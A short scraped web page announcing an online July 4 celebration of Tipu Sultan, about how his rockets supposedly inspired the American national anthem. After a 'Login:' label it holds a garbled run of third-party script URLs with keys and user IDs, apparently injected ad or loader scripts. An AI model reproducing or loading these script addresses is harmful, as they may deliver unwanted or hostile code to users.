The Rockets of Tipu Sultan

The American Institute of Islamic History and Culture

Invites you to

July 4 Worldwide Celebration of

Tipu Sultan

9 am – 11 am California Time PST

(12 noon – 2 pm New York EST; 9.30 pm – 11.30 pm India time IST;                         9 pm to 11 pm Pakistan time;          4 pm – 6 pm London Time GMT)

How the Rockets of Tipu Sultan inspired the American National Anthem

Eminent scholars from the US, Canada, UK, India and other parts of the world will speak

Login:

//cilkonlay.com/21890722da51ec3508.jshttps://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8585xhttps://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8585x&format=arrjs&r=1591571182983https://cilkonlay.com/ext/21890722da51ec3508.js?sid=52564_8585_&title=a&blocks%5B%5D=31af2

Comments are closed.

%d bloggers like this: